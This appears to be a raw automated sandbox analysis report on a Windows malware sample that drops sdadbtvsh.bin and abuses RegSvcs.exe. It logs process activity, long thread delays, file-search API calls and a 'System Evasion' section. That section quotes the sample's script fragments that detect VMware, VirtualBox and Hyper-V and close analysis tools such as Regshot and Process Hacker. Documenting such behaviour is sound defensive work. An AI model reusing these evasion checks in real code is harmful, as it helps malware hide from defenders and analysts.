                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598263420.000000000175F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1746432697.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                          Source: sdadbtvsh.bin.exe, 00000014.00000002.1753079110.0000000000D78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")P
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208129774.00000000017B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE1
                          Source: sdadbtvsh.bin.exe, 00000014.00000003.1752049133.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1744085917.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")Y
                          Source: sdadbtvsh.bin.exe, 00000014.00000003.1746432697.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEOWG
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1502498229.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954085985.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1955387014.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953788447.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206401389.000000000175A000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, nngqrvwq.xl.0.dr, nngqrvwq.xl.8.drBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                          Source: sdadbtvsh.bin.exe, 0000001A.00000002.1956682137.0000000001578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")5*=
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2206401389.000000000175A000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2130760562.0000000001754000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2209331519.000000000175B000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000002.2210525293.000000000175D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENKQ9UK
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, nngqrvwq.xl.0.dr, nngqrvwq.xl.8.drBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                          Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES=&.
                          Source: sdadbtvsh.bin, 00000008.00000002.1603220411.00000000016C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208129774.00000000017B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES,
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1502498229.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1752049133.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000002.1753460451.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1744085917.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598450834.000000000175C000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598346984.000000000174F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1746432697.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
                          Source: sdadbtvsh.bin.exe, 00000023.00000002.2210346244.0000000001728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")I
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598450834.000000000175C000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598346984.000000000174F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
                          Source: nngqrvwq.xl.0.dr, nngqrvwq.xl.8.drBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1014Jump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23555
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binAPI coverage: 5.4 %
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeAPI coverage: 4.8 %
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\PO3311926.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00BAA69B
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00BBC220
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BCB348 FindFirstFileExA,0_2_00BCB348
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005FE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_005FE387
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005FD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_005FD836
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005FDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_005FDB69
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00609F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00609F9F
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0060A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_0060A0FA
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0060A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_0060A488
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_006065F1 FindFirstFileW,FindNextFileW,FindClose,8_2_006065F1
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005CC642 FindFirstFileExW,8_2_005CC642
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00607248 FindFirstFileW,FindClose,8_2_00607248
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_006072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_006072E9
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ACE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,20_2_00ACE387
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ACD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00ACD836
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AD9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00AD9F9F
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ADA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00ADA0FA
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ADA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,20_2_00ADA488
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AD65F1 FindFirstFileW,FindNextFileW,FindClose,20_2_00AD65F1
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A9C642 FindFirstFileExW,20_2_00A9C642
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AD72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,20_2_00AD72E9
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AD7248 FindFirstFileW,FindClose,20_2_00AD7248
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ACDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00ACDB69
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBE6A3 VirtualQuery,GetSystemInfo,0_2_00BBE6A3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeThread delayed: delay time: 922337203685477
                          Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe
                          Source: nngqrvwq.xl.8.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2209331519.000000000175B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                          Source: sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954798613.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exeM
                          Source: sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then2JI
                          Source: sdadbtvsh.bin.exe, 00000014.00000002.1753584117.0000000000DEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exei
                          Source: sdadbtvsh.bin.exe, 0000001A.00000003.1955630909.000000000158F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Thennd.x
                          Source: nngqrvwq.xl.8.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1502498229.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then37
                          Source: RegSvcs.exe, 0000000F.00000002.2614141887.000000000D224000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: sdadbtvsh.bin, 00000008.00000003.1599977444.000000000173F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exeM
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe+
                          Source: sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Thenp7h
                          Source: sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") ThenG4
